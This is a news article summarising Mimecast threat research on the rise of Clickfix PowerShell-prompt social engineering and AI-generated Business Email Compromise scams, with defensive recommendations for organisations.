AI-Powered Hacking: How Clickfix Tools Are Breaching Systems
▼ Summary
– Clickfix social engineering attacks surged by 500% in early 2025, accounting for roughly 8% of all cyberattacks.
– Cybercriminals are increasingly using AI to create convincing Business Email Compromise scams, including fake email chains and deepfake content.
– AI-powered phishing and social engineering attacks are becoming harder to detect due to automated, targeted content generation.
– High-risk sectors for impersonation and social engineering include education, IT, legal, telecommunications, and real estate due to their access to sensitive data.
– Key defense recommendations include implementing multi-factor authentication, employee training, zero-trust architecture, and awareness of Clickfix tactics.
A dramatic 500% surge in Clickfix attacks during early 2025 signals a dangerous shift in cybercriminal tactics, where artificial intelligence is now being leveraged to craft highly convincing phishing and Business Email Compromise (BEC) scams. These methods increasingly target the human element, bypassing traditional security measures by tricking individuals into compromising their own systems. Recent analysis from Mimecast’s Global Threat Intelligence Report, which examined trillions of threat signals from the first three quarters of 2025, confirms that while familiar threats like ransomware and phishing persist, attackers are refining their focus toward social engineering with alarming efficiency.
Clickfix represents a particularly insidious social engineering technique that sidesteps conventional anti-phishing defenses. Instead of relying on malware to infiltrate networks, attackers present users with fake error messages, bogus technical alerts, or offers for free licensed software. These prompts come with step-by-step instructions that appear helpful but actually guide victims to open PowerShell and enter commands. Once executed, these commands download malicious payloads such as information stealers, ransomware, or remote access trojans. Mimecast’s data indicates Clickfix now accounts for roughly 8% of all cyberattacks, a figure that underscores its growing popularity among threat groups.
According to Hiwot Mendahun, a Threat Research Engineer at Mimecast, cybercriminals are increasingly adopting Clickfix for initial network access. She notes that this technique is expected to remain a favored method for deploying infostealers, ransomware, and custom malware. Mendahun also highlighted a parallel rise in the abuse of Remote Monitoring and Management (RMM) tools, with campaigns heavily emphasizing social engineering to deceive targets.
In parallel, AI is revolutionizing Business Email Compromise schemes. While impersonating executives or vendors is not new, AI tools now generate entire fabricated email threads that mimic conversations between multiple parties, including vendors, employees, and high-level executives. Attackers gather intelligence during reconnaissance, accessing financial reports, HR data, or payroll details, then use AI to create a false sense of urgency, such as demanding immediate invoice payments. Recent BEC attacks have centered on fraudulent invoices, altered bank details, payroll updates, and wire transfer requests. As AI technology becomes more accessible, these schemes are not only more convincing but also easier for less-skilled criminals to execute.
Mendahun explained that AI allows threat actors to automate the creation of targeted email threads, potentially evading content-based detection systems. She also pointed to the emerging use of deepfake audio and video in BEC campaigns, which significantly boosts the success rate for large-scale fraudulent transactions.
Industries most vulnerable to these impersonation and social engineering attacks include education, information technology, telecommunications, legal services, and real estate. These sectors are targeted because they frequently handle high-value transactions, manage confidential client information, and have direct access to sensitive financial systems. Mimecast observed that social engineering attacks against real estate firms are climbing steadily, suggesting some criminal groups may be shifting focus from traditional targets to this industry. Notorious threat groups such as Scattered Spider and TA2541 have been associated with attacks on these sectors.
While phishing and social engineering are age-old problems, their execution continues to evolve, and Clickfix introduces a particularly hazardous dimension. To mitigate risk, organizations should consider several defensive measures:
Implementing increased controls, such as additional authentication and authorization checks across multiple platforms or departments, can help intercept fraudulent invoices and unauthorized payment requests before funds are transferred.
Multi-factor authentication (MFA) provides a critical safety net; even if credentials are phished, MFA can prevent account takeover.
Ongoing training and awareness programs are essential, especially for staff with privileged access or roles involving payment systems. Training should be frequent and updated to cover emerging threats like BEC and Clickfix, not treated as a one-time event.
Adopting a zero-trust architecture ensures employees only have access to resources necessary for their specific roles, effectively shrinking the organization’s attack surface.
Regarding Clickfix specifically, conventional anti-phishing tools are ineffective because the attack manipulates users into acting on their own. Raising awareness about this technique is crucial, employees must understand that executing unfamiliar commands can lead to full system compromise.
(Source: ZDNET)
